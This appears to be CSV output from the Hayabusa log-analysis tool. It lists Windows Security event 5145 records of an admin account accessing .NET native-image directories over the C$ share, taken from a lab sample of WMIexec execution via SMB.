+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy\9efa8cc0254efc497ae439914bbe9207 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbwizfx\8feba1d1646b72a4bc348315fa7bad6b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ComSvcConfig\44570ea6e616aa8a35b0768a4336f69d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.450 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\CustomMarshalers\a5132d26ad1468bf7b6b89725e4cefce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\dfsvc\a086b75bb1e8ee361af6ed079a6b77b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EmbeddedLockdown\870a6acacd5e95c0ffca82696cdb1d38 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\EventViewer\dc4701b2db7cf17a8b91db454a97c991 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.466 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.482 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ipamapi\dae9598a3b2d70231e340696e284163f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.497 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A3ec156ec#\e6ff20c47a7e849012d7ce8bdd777896 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.A26c32abb#\e58c4e8c63c0494a59885d5502339144 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.529 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Abf69f55a#\9f5bb7b6ff9da9d2a0649311aef761e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
